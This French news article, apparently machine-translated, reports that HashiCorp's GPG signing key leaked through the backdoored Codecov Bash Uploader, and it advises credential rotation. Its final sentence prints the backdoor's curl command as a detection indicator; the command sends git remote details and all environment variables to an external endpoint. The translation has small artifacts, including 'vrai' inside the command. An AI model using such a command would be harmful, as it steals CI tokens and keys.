HashiCorp, connu pour développer les outils open source Vagrant, Packer, Nomad et Terraform, a annoncé la fuite de la clé privée GPG utilisée pour créer des signatures numériques vérifiant les versions. Les attaquants ayant accès à la clé GPG pourraient potentiellement apporter des modifications cachées aux produits HashiCorp en les vérifiant avec une signature numérique correcte. Dans le même temps, l'entreprise a déclaré que lors de l'audit, aucune trace de tentatives visant à apporter de telles modifications n'avait été identifiée.
Actuellement, la clé GPG compromise a été révoquée et une nouvelle clé a été introduite à sa place. Le problème affectait uniquement la vérification à l'aide des fichiers SHA256SUM et SHA256SUM.sig, et n'affectait pas la génération de signatures numériques pour les packages Linux DEB et RPM fournis via releases.hashicorp.com, ni les mécanismes de vérification des versions pour macOS et Windows (AuthentiCode). .
La fuite s'est produite en raison de l'utilisation du script Codecov Bash Uploader (codecov-bash) dans l'infrastructure, conçu pour télécharger des rapports de couverture à partir de systèmes d'intégration continue. Lors de l’attaque contre la société Codecov, une porte dérobée a été cachée dans le script spécifié, à travers laquelle des mots de passe et des clés de cryptage ont été envoyés au serveur des attaquants.
Pour pirater, les attaquants ont profité d'une erreur dans le processus de création de l'image Codecov Docker, qui leur a permis d'extraire les données d'accès à GCS (Google Cloud Storage), nécessaires pour apporter des modifications au script Bash Uploader distribué depuis codecov.io. site web. Les modifications ont été apportées le 31 janvier, sont restées indétectables pendant deux mois et ont permis aux attaquants d'extraire des informations stockées dans les environnements des systèmes d'intégration continue des clients. En utilisant le code malveillant ajouté, les attaquants pourraient obtenir des informations sur le référentiel Git testé et toutes les variables d'environnement, y compris les jetons, les clés de chiffrement et les mots de passe transmis aux systèmes d'intégration continue pour organiser l'accès au code d'application, aux référentiels et aux services tels qu'Amazon Web Services et GitHub.
En plus de l'appel direct, le script Codecov Bash Uploader a été utilisé dans le cadre d'autres téléchargeurs, tels que Codecov-action (Github), Codecov-circleci-orb et Codecov-bitrise-step, dont les utilisateurs sont également concernés par le problème. Il est recommandé à tous les utilisateurs de codecov-bash et de produits associés d'auditer leurs infrastructures, ainsi que de modifier les mots de passe et les clés de cryptage. Vous pouvez vérifier la présence d'une porte dérobée dans un script par la présence de la ligne curl -sm 0.5 -d « $(git remote -v)<<<<<< ENV $(env) » http:// /upload/v2 || vrai
Source: opennet.ru